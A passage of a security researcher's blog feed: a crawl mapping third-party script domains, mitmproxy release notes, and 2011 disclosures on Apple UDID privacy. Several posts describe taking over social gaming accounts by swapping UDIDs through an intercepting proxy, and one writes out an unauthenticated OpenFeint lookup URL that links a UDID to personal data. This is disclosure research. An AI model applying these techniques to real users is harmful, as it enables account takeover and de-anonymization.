At the same time, all\ntraffic is routed through a specialised version of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, and captured for later analysis. The result\nis a very detailed snapshot of what viewing a given URL actually <em>does<\/em>. The\nnext step is to do this \"at scale\" - this means running many instances of this\nprocess in parallel on headless servers, decoupling things using queues, backing\nit all onto a database, and then spending days and days fine-tuning. I'm happy\nwith my progress so far - my infrastructure is now now scanning all the URLs\npassing through <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>,\n<a rel=\"external\" href=\"http:\/\/reddit.com\">Reddit<\/a>, <a rel=\"external\" href=\"http:\/\/digg.com\">Digg<\/a>,\n<a rel=\"external\" href=\"http:\/\/delicious.com\">Delicious<\/a> and <a rel=\"external\" href=\"http:\/\/pinboard.in\">Pinboard<\/a> in\nrealtime, without breaking a sweat.<\/p>\n<p>I am pretty excited about the possibilities for this project, and I'm exploring\nplans for the future with like-minded security folk. Get in touch if this\ninterests you, and keep an eye on my blog for more news.<\/p>\n<p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs.\nBelow is a quick peek at one tiny slice of this data - an appetizer for things\nto come.<\/p>\n<h2 id=\"neighborhoods-of-trust\">Neighborhoods of trust<\/h2>\n<div class=\"media\">\n    <a href=\"full.png\">\n        <img src=\"wholegraph.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This graph shows structures that emerge from the way sites use third-party\nexecutable resources. In this context, \"executable\" means means JavaScript,\nFlash and HTML, and \"third-party\" means domains other than the URL's own. The\nnodes in this graph are the third-party domains, and the edges are associations\nbetween them via the URLs I crawled. For example, if a site loaded scripts from\nboth Google Analytics and from Doubleclick, that would create (or reinforce) an\nedge between the nodes \"google-analytics.com\" and \"doubleclick.com\".  Using\nthis data, I calculated a co-occurrence coefficient for the third-party\nsources, and then extracted the resulting neighbourhood structures\n<a rel=\"external\" href=\"http:\/\/lanl.arxiv.org\/abs\/0803.0476\">algorithmically<\/a>. The neighbourhood\ninformation was used to colour and lay out the graph, trying to keep nodes that\nare closely correlated together. Finally, nodes are scaled based on how many\nURLs reference them.<\/p>\n<p>The result is a rather stunning graph showing neighborhoods of trust - areas of\nthe Internet bound together based on the third parties allowed to run code in\nusers' browsers. I've spent a few hours playing with this data, and the sheer\nrange of interesting structure is surprising. At one end of the spectrum, you\ncan zoom in to the individual node relationships, and find small clusters of\nsurprising sites that cross-load resources from each other, often because they\nare owned by the same entity. At the other end, countries, language groups, and\nbroad fields of interest aggregate in huge tribes of kinship.<\/p>\n<p>Here are a few of the larger-scale features from the graph.<\/p>\n<h3 id=\"mainstream\">Mainstream<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-b.png\">\n        <img src=\"wholegraph-b.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The most widely used resources dominate in the neighbourhood\nextraction algorithm, which causes them to cluster together in\ntheir own super-community. The top nodes in this cluster,\ndescending order of occurrence are: google-analytics.com,\nfacebook.com, doubleclick.net, fbcdn.net, quantserve.com,\ntwitter.com, google.com, googlesyndication.com, googleapis.com,\nscorecardresearch.net, facebook.net, addthis.com. These are\nalso the top nodes overall.<\/p>\n<h3 id=\"japanese\">Japanese<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-a.png\">\n        <img src=\"wholegraph-a.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The main resources are hatena.ne.jp, microad.jp, mixi.jp,\nyahoo.co.jp, nakanohito.jp. More surprisingly, also in this cluster\nare topsy.com, appspot.com and postrank.com. Perhaps these\nresources are especially commonly used on Japanese sites.<\/p>\n<h3 id=\"russian\">Russian<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-d.png\">\n        <img src=\"wholegraph-d.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru,\nopenstat.net, userapi.com, shinystat.net, and dt00.net<\/p>\n<h3 id=\"porn\">Porn<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-c.png\">\n        <img src=\"wholegraph-c.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>And here we have a portion of the web dedicated to porn. The top\nresources are awempire.com, clickbank.net, picadmedia.com,\ngetresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com,\njuicyads.com, brazzers.com, etology.com, data-ero-advertising.com\nand viddler.com. A more surprising inclusion in this group is\nwufoo.com - I wonder if this is an artifact, or whether Wufoo\nreally does have a use in the adult content world.<\/p>\n<h3 id=\"misc\">Misc<\/h3>\n<div class=\"media\">\n    <a href=\"wholegraph-e.png\">\n        <img src=\"wholegraph-e.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Just to show that it's not all clear-cut, here's an example of a\nneighbourhood I find harder to explain. The top resources are\nnetdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com,\nsuitesmart.com, demdex.net, adfrontiers.com, lycos.com and\nbreak.com. I speculate that this group might be loosely aligned\naround a number of big CDNs and analysis suites.<\/p>\n<h2 id=\"tech\">Tech<\/h2>\n<p>The graph in this post was created, analyzed and pre-processed using\n<a rel=\"external\" href=\"http:\/\/projects.skewed.de\/graph-tool\/\">graph-tool<\/a>, a great Python library for\ndealing with large graphs. The visualization and modularity analysis was done\nusing the ever-wonderful <a rel=\"external\" href=\"http:\/\/gephi.org\/\">Gephi<\/a>. If these aren't both in\nyour arsenal of analysis tools, you're missing out.<\/p>\n"},{"title":"Why the Apple UDID had to die","published":"2011-09-09T00:00:00+00:00","updated":"2011-09-09T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-must-die\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-must-die\/","content":"<p><strong>EDIT: A <a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2011\/09\/19\/privacy-risk-found-on-cellphone-games\/\">WSJ Digits\narticle<\/a>\nis now up, containing a responses from Zynga and Chillingo. Other networks\ndeclined to comment.<\/strong><\/p>\n<p>A UDID is a \"Unique Device Identifier\" - you can think of it as a serial number\nburned permanently into every iPhone, iPad and iPod Touch. Any installed app can\naccess the UDID without requiring the user's knowledge or consent.  We know that\nUDIDs are very widely used - in a sample of 94 apps I tested, <a href=\"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/\">74% silently sent\nthe UDID to one or more servers on the\nInternet<\/a>, often without\nencryption. This means that UDIDs are not secret values - if you use an Apple\ndevice regularly, it's certain that your UDID has found its way into scores of\ndatabases you're entirely unaware of. Developers often assume UDIDs are\nanonymous values, and routinely use them to aggregate detailed and sensitive\nuser behavioural information. One example is Flurry, a mobile analytics firm\nused by 15% of apps I tested, which can monitor application startup, shutdown,\nscores achieved, and a host of other application-specific events, all linked to\nthe user's UDID. I recently showed that it was possible to use\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/OpenFeint\">OpenFeint<\/a>, a large mobile social\ngaming network, to <a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">de-anonymize\nUDIDs<\/a>, linking them\nto usernames, email addresses, GPS locations, and even Facebook profiles.<\/p>\n<p>This post looks at the way UDIDs are used in the broader social gaming\necosystem. The work is based on a simple question: what happens if we swap our\nUDID for another while communicating with the network?  There are a number of\nways to do this - in my case I used <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, an\nintercepting HTTP\/S proxy I developed which lets me re-write the traffic leaving\na device on the fly. In most cases this was a simple matter of replacing one\nstring with another, but two networks (Scoreloop and Crystal) prevented UDID\nsubstitution using cryptography. Unfortunately, both networks relied on the\nsecrecy of key material distributed in the application binaries to every device.\nI have verified that it is possible to reverse engineer the application binaries\nto extract the key material and circumvent the cryptographic protection.<\/p>\n<p>The outcome of this experiment shows that social gaming networks systematically\nmisuse UDIDs, resulting in serious privacy breaches for their users. All the\nnetworks I tested allowed UDIDs to be linked to potentially identifying user\ninformation, ranging from usernames to email addresses, friends lists and\nprivate messages. Furthermore, 5 of the 7 networks allow an attacker to log in\nas a user using only their UDID, giving the attacker complete control of the\nuser's account. Two networks had further problems that compromised a user's\nFacebook and Twitter accounts - Crystal lets an attacker take control of a user\naccounts by leaking API keys, while Scoreloop partially discloses users' friends\nlists, even if they are private.<\/p>\n<style>\n    .yes {\n        background-color: #d55858;\n        color: #000000;\n    }\n    .no {\n        background-color: #5bd65b;\n        color: #000000;\n    }\n\n<\/style>\n<table>\n    <tr>\n        <th><\/th>\n        <th>Data leaked<\/th>\n        <th>Login as user<\/th>\n        <th>Social Media Accounts<\/th>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.chillingo.com\/\">Crystal<\/a><\/th>\n        <td class=\"yes\"> Username, friends, Facebook, Twitter, games played, location, email address <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"yes\"> Control of Facebook, Twitter accounts<\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.gameloft.com\/\">GameLoft<\/a><\/th>\n        <td class=\"yes\"> Username, email address, games played, nationality, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.geocade.com\/\">Geocade<\/a><\/th>\n        <td class=\"yes\"> Username, email address, games played, location <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/openfeint.com\/\">OpenFeint<\/a><\/th>\n        <td class=\"yes\"> Username, last played game, online status, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.scoreloop.com\/\">Scoreloop<\/a><\/th>\n        <td class=\"yes\"> Email address, gender, username, nationality, friends <\/td>\n        <td class=\"yes\"> Yes <\/td>\n        <td class=\"yes\"> Access private Facebook and Twitter friends lists <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/plusplus.com\/\">Plus+<\/a><\/th>\n        <td class=\"yes\"> Username <\/td>\n        <td class=\"no\"> No <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n    <tr>\n        <th><a href=\"http:\/\/www.zynga.com\/\">Zynga<\/a><\/th>\n        <td class=\"yes\"> First name, username, friends*, in-game messages*,\n        mobile number*<\/td>\n        <td class=\"yes\"> Yes* <\/td>\n        <td class=\"no\"> No <\/td>\n    <\/tr>\n<\/table>\n<p>* The starred Zynga findings rely on the fact that other networks can be used\nto obtain the user's email address using the UDID.<\/p>\n<p>There are two caveats to keep in mind while considering these results. First,\nthe findings are based on the default settings for each social network - some\nnetworks may have settings that reduce the amount of information exposed.\nSecond, some of the data leaked is optional - for instance, it's not mandatory\nfor a user to link Facebook or Twitter accounts with any of the networks.<\/p>\n<p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and\nScoreloop teams have both repaired the problems that could lead to a follow-on\ncompromise of a user's social network accounts. At the time of writing, it is\nstill possible to log in as a user using only a UDID on five of the vulnerable\nnetworks.<\/p>\n<h2 id=\"the-future\">The future<\/h2>\n<p>A few days after I notified the companies involved, it was revealed that Apple\nwas <a rel=\"external\" href=\"http:\/\/techcrunch.com\/2011\/08\/19\/apple-ios-5-phasing-out-udid\/\">quietly killing the UDID\nAPI<\/a>. It will\nstill be present in IOS5, but is marked deprecated, and will probably be\nremoved in future. I recommend that developers shift away from using UDIDs now,\nrather than wait for formal removal of the API.<\/p>\n<p>We can now expect a frenzy of activity as developers look for alternatives. The\nchallenge will be to make sure that the cure isn't as bad as the disease -\nApple's recommendation to \"create a unique identifier specific to your app\"\ncould tempt developers to replicate the UDID mechanism on a smaller scale,\nflaws and all. Expect more blog posts on this topic soon.<\/p>\n"},{"title":"mitmproxy 0.6","published":"2011-08-07T00:00:00+00:00","updated":"2011-08-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_6\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_6\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned\nscripting API, slew of major new features and a panoply of small bugfixes and\nimprovements.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>New scripting API that allows much more flexible and fine-grained\nrewriting of traffic. See the docs for more info.<\/li>\n<li>Support for gzip and deflate content encodings. A new \"z\"\nkeybinding in mitmproxy to let us quickly encode and decode content, plus\nautomatic decoding for the \"pretty\" view mode.<\/li>\n<li>An event log, viewable with the \"v\" shortcut in mitmproxy, and the \"-e\"\ncommandline argument in both mitmproxy and mitmdump.<\/li>\n<li>Huge performance improvements both in the mitmproxy interface, and loading\nlarge numbers of flows from file.<\/li>\n<li>A new \"replace\" convenience method for all flow objects, that does a\nuniversal regex-based string replacement.<\/li>\n<li>Header management has been rewritten to maintain both case and order.<\/li>\n<li>Improved stability for SSL interception.<\/li>\n<li>Default expiry time on generated SSL certs has been dropped to avoid an\nOpenSSL overflow bug that caused certificates to expire in the distant\npast on some systems.<\/li>\n<li>A \"pretty\" view mode for JSON and form submission data.<\/li>\n<li>Expanded documentation and examples.<\/li>\n<li>Many other small improvements and bugfixes.<\/li>\n<\/ul>\n"},{"title":"mitmproxy 0.5","published":"2011-06-27T00:00:00+00:00","updated":"2011-06-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_5\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_5\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just tagged and released mitmproxy 0.5. Everyone should update - this\nrelease squelches a few annoying performance killers. You can download it from\nthe project website:<\/p>\n<h2 id=\"mitmproxy-org\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a><\/h2>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>An -n option to start the tools without binding to a proxy port.<\/li>\n<li>Allow scripts, hooks, sticky cookies etc. to run on flows loaded from\nsave files.<\/li>\n<li>Regularize command-line options for mitmproxy and mitmdump.<\/li>\n<li>Add an \"SSL exception\" to mitmproxy's license to remove possible\ndistribution issues.<\/li>\n<li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL\ncertificate is generated. This can pave over small discrepancies in\nsystem time between the client and server.<\/li>\n<li>Handle viewing big request and response bodies more elegantly. Only\nrender the first 100k of large documents, and try to avoid running the\nXML indenter on non-XML data.<\/li>\n<li><strong>BUGFIX<\/strong>: Make the \"revert\" keyboard shortcut in mitmproxy work after a\nflow has been replayed.<\/li>\n<li><strong>BUGFIX<\/strong>: Repair a problem that sometimes caused SSL connections to consume\n100% of CPU.<\/li>\n<\/ul>\n"},{"title":"UDID media roundup","published":"2011-06-10T00:00:00+00:00","updated":"2011-06-10T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-media-roundup\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-media-roundup\/","content":"<p>After a hectic month, I'm finally able to return to the UDID privacy issues I\ncovered in my last few blog posts. I plan to publish some further results soon,\nbut first, a quick roundup of the media coverage of the <a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">OpenFeint UDID\nde-anonymization\nresult<\/a>.<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2011\/05\/11\/the-privacy-risks-of-id-codes-in-your-apps\/\">A post on on the Wall Street Journal tech\nblog<\/a>\nby <a rel=\"external\" href=\"http:\/\/www.jennifervalentinodevries.com\/\">Jennifer Valentino-DeVries<\/a>, one\nof the very few journalists who do good, novel investigative work into issues\nlike UDID privacy.<\/li>\n<li>An interview with <a rel=\"external\" href=\"http:\/\/www.repubblica.it\/tecnologia\/2011\/06\/03\/news\/identificativo_iphone-17073898\/\">La\nRepubblica<\/a>,\na major Italian daily.<\/li>\n<li>An article in <a rel=\"external\" href=\"http:\/\/www.spiegel.de\/netzwelt\/gadgets\/0,1518,761735,00.html\">Der Spiegel<\/a>.<\/li>\n<li>Coverage on <a rel=\"external\" href=\"http:\/\/articles.cnn.com\/2011-05-09\/tech\/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH\">CNN\nonline<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.wired.com\/gadgetlab\/2011\/05\/iphone-udid\/\">Wired Gadgetlab<\/a> and the\n<a rel=\"external\" href=\"http:\/\/www.huffingtonpost.com\/2011\/05\/10\/iphone-udid-personal-information-identity_n_860139.html\">Huffington\nPost<\/a>.<\/li>\n<li>And, last but not least, a <a rel=\"external\" href=\"http:\/\/netsecpodcast.com\/?p=772\">nice 30-minute\ninterview<\/a> with <a rel=\"external\" href=\"https:\/\/twitter.com\/#!\/quine\">Zach\nLanier<\/a> from the <a rel=\"external\" href=\"http:\/\/netsecpodcast.com\/\">Network Security\nPodcast<\/a>. This is your opportunity to get some more\ndetails on the OpenFeint issue and find out what a a weird accent I have.<\/li>\n<\/ul>\n<p>The issue was also mentioned on many, many blogs and smaller publications.<\/p>\n"},{"title":"How UDIDs are used: a survey","published":"2011-05-19T00:00:00+00:00","updated":"2011-05-19T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/","content":"<p>I recently published some\n<a href=\"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/\">research<\/a> showing\nthat the OpenFeint social gaming network can be used to link Apple UDIDs to\nusers' real-world identities. To understand why this is a problem, we have to\nlook at the way UDIDs are used in the broader app ecosystem. Once we do this, we\nsee that the vast majority of applications send UDIDs to servers on the\nInternet, and that UDID-linked user information is aggregated in literally\nthousands of databases on the net. In this context, UDID de-anonymization is a\nserious threat to user privacy.<\/p>\n<p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a rel=\"external\" href=\"http:\/\/www.pskl.us\/wp\/?p=476\">looked\nat the unencrypted portion of app traffic<\/a>, and\nfound that 68% of tested apps send UDIDs upstream in the clear. I was curious to\nsee what the figures would look like if encrypted (HTTPS) traffic was included,\nso I decided to do my own survey, using <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> to\nanalyse all traffic from the 94 applications I had installed on my iPhone. Below\nis a set of graphs highlighting the main facts. I've also published a list of\nall applications and the domains they contacted <a href=\"https:\/\/corte.si\/posts\/security\/apple-udid-survey\/appdomains.html\">here<\/a> - it\nmakes for interesting reading.<\/p>\n<h2 id=\"apps-are-noisier-than-you-think-they-are\">Apps are noisier than you think they are<\/h2>\n<div class=\"media\">\n    <a href=\"all_domains.png\">\n        <img src=\"all_domains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>84% of apps tested contacted one or more domains during use. At the extreme end,\n<a rel=\"external\" href=\"http:\/\/itunes.apple.com\/us\/app\/idestroy-wicked-sick-stress\/id309689677?mt=8\">iDestroy<\/a>\ncontacted 14 domains, including 3 different ad networks and OpenFeint.<\/p>\n<h2 id=\"and-send-your-udid-to-more-places-than-you-expect\">... and send your UDID to more places than you expect<\/h2>\n<div class=\"media\">\n    <a href=\"udid_domains.png\">\n        <img src=\"udid_domains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>74% of apps tested sent the device UDID  to one or more domains.<\/p>\n<h2 id=\"often-without-encryption\">... often without encryption<\/h2>\n<div class=\"media\">\n    <a href=\"udid_scheme.png\">\n        <img src=\"udid_scheme.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps\ntransmitting UDIDs used encryption for all UDID traffic<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>.<\/p>\n<h2 id=\"a-few-big-udid-aggregators-dominate\">A few big UDID aggregators dominate<\/h2>\n<div class=\"media\">\n    <a href=\"topdomains.png\">\n        <img src=\"topdomains.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Three big aggregators of UDID-related data dominate: <a rel=\"external\" href=\"http:\/\/apple.com\">Apple<\/a>,\n<a rel=\"external\" href=\"http:\/\/www.flurry.com\">Flurry<\/a>, and <a rel=\"external\" href=\"http:\/\/www.openfeint.com\">OpenFeint<\/a>. Each\none of these companies has the vast majority of UDIDs on file, linked to a rich\nset of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons\nwhy UDID de-anonymization using their API is so serious.<\/p>\n<h2 id=\"behind-them-are-a-long-tail-of-smaller-aggregators\">...  behind them are a long tail of smaller aggregators<\/h2>\n<p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a\nmixture of ad networks, analytics firms, individual developer sites, and\nonline services.<\/p>\n<table>\n<tr>\n<td> ads.mp.mydas.mobi <\/td>\n<td> analytics.localytics.com <\/td>\n<td> api.dropbox.com <\/td>\n<\/tr>\n<tr>\n<td> bayobongo.com <\/td>\n<td> bbc.112.2o7.net <\/td>\n<td> beatwave.collect3.com.au <\/td>\n<\/tr>\n<tr>\n<td> catalog.lexcycle.com <\/td>\n<td> data.mobclix.com <\/td>\n<td> init.gc.apple.com <\/td>\n<\/tr>\n<tr>\n<td> msh.amazon.com <\/td>\n<td> notifications.lexcycle.com <\/td>\n<td> promo.limbic.com <\/td>\n<\/tr>\n<tr>\n<td> soma.smaato.com <\/td>\n<td> www.chimerasw.com <\/td>\n<td> www.phasiclabs.com <\/td>\n<\/tr>\n<tr>\n<td> www.trainyard.ca <\/td>\n<td> api.twitter.com <\/td>\n<td> ngpipes.ngmoco.com <\/td>\n<\/tr>\n<tr>\n<td> npr.122.2o7.net <\/td>\n<td> ws.tapjoyads.com <\/td>\n<td>  <\/td>\n<\/tr>\n<\/table>\n<h2 id=\"methodology\">Methodology<\/h2>\n<p>For each application, I started a logging instance of mitmdump, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">mitmdump<\/span><span style=\"color: #005CC5;\"> -w<\/span><span style=\"color: #032F62;\"> appname<\/span><\/span><\/code><\/pre>\n<p>I then started up the application, interacted with anything that might elicit\nnetwork traffic, and shut it down. The collected data was analyzed with a simple\nscript, that used the <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/library.html\">libmproxy<\/a> API to\ntraverse the traffic dumps and extract the needed information.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>The fact that 54% of UDID-using apps would have gone undetected by\nSmith's study seems to indicate that there should be a much greater difference\nbetween our results - Smith found 68% of apps use UDIDs vs my 74%. The\ndiscrepancy can be accounted for by the fact that we used different samples -\nSmith used predominantly applications in Apple's \"Top Free\" lists, whereas I\nused both paid and unpaid applications that happened to be on my phone.<\/p>\n<\/div>\n"},{"title":"De-anonymizing Apple UDIDs with OpenFeint","published":"2011-05-04T00:00:00+00:00","updated":"2011-05-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/","content":"<p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier\n(UDID). You can think of the UDID as a serial number burned into the device -\none that can't be removed or changed<sup class=\"footnote-reference\"><a href=\"#1\">1<\/a><\/sup>. This number is exposed to app\ndevelopers through an API, without requiring the device owner's permission or\nknowledge.<\/p>\n<p>Few Apple users realise just how widely their UDIDs are used. <a rel=\"external\" href=\"http:\/\/www.pskl.us\/wp\/?p=476\">Research\nshows<\/a> that 68% of apps silently send UDIDs to\nservers on the Internet. This is often accompanied by information on how, when\nand where the device is used.  The most common destination for traffic\ncontaining a user's UDID is Apple itself, followed by the\n<a rel=\"external\" href=\"http:\/\/www.flurry.com\/\">Flurry<\/a> mobile analytics network and OpenFeint, a\nmobile social gaming company. These companies are uber-aggregators of\nUDID-linked user information, because so many apps use their APIs. Trailing\nbehind the big three are thousands of individual developer sites, ad servers and\nsmaller analytics firms. Users have no way to stop their device from offering up\ntheir UDID, telling who their data is being sent to, or even telling that it's\nhappening at all. This situation has caused wide-spread concern, including\ncoverage in the <a rel=\"external\" href=\"http:\/\/blogs.wsj.com\/digits\/2010\/12\/19\/unique-phone-id-numbers-explained\/\">Wall Street\nJournal<\/a>,\nand <a rel=\"external\" href=\"http:\/\/www.txinjuryblog.com\/tags\/udid-lawsuit\/\">two<\/a>\n<a rel=\"external\" href=\"http:\/\/www.infosecurity-us.com\/view\/15643\/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties\/\">lawsuits<\/a>\naimed at Apple.<\/p>\n<p>The saving grace is that your device UDID is not linked to your real-world\nidentity. If it were possible to de-anonymize UDIDs, the result would be a\nserious privacy breach. Apple is well aware of this, and <a rel=\"external\" href=\"http:\/\/developer.apple.com\/library\/ios\/#documentation\/uikit\/reference\/UIDevice_Class\/Reference\/UIDevice.html\">explicitly tells\ndevelopers that they are not permitted to publicly link a UDID to a user\naccount<\/a>.<\/p>\n<p>I recently published a tool called <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>, a\nman-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted\nHTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS\ndevices, I was able to observe protocols and data flows that have clearly\nreceived very little external review. A slew of interesting security results\nfollowed (keep an eye on this blog), but by far the most alarming was the fact\nthat it was possible to use OpenFeint to completely de-anonymize a large\nproportion of UDIDs.<\/p>\n<h2 id=\"de-anonymizing-udids-with-openfeint\">De-anonymizing UDIDs with OpenFeint<\/h2>\n<h3 id=\"linking-udids-to-openfeint-user-accounts\">Linking UDIDs to OpenFeint user accounts<\/h3>\n<p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to\nOpenFeint's servers, which then return a list of associated accounts:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>https:\/\/api.openfeint.com\/users\/for_device.xml?udid=XXX<\/span><\/span><\/code><\/pre>\n<p>This is a completely unauthenticated call - you can try it out by cutting and\npasting it into your browser, replacing XXX with <a rel=\"external\" href=\"http:\/\/support.apple.com\/kb\/HT4061\">your own\nUDID<\/a>. Here's an example of the response for\nmy UDID, with sensitive information removed:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;?<\/span><span style=\"color: #22863A;\">xml<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span style=\"color: #6F42C1;\"> encoding<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;UTF-8&quot;<\/span><span>?&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">resources<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>  &lt;<\/span><span style=\"color: #22863A;\">user<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">chat_enabled<\/span><span>&gt;true&lt;\/<\/span><span style=\"color: #22863A;\">chat_enabled<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">gamer_score<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">gamer_score<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">id<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">id<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">last_played_game_id<\/span><span>&gt;187402&lt;\/<\/span><span style=\"color: #22863A;\">last_played_game_id<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">last_played_game_name<\/span><span>&gt;tiny wings&lt;\/<\/span><span style=\"color: #22863A;\">last_played_game_name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">lat<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">lat<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">lng<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">lng<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">online<\/span><span>&gt;false&lt;\/<\/span><span style=\"color: #22863A;\">online<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_source<\/span><span>&gt;FbconnectCredential&lt;\/<\/span><span style=\"color: #22863A;\">profile_picture_source<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_updated_at<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: 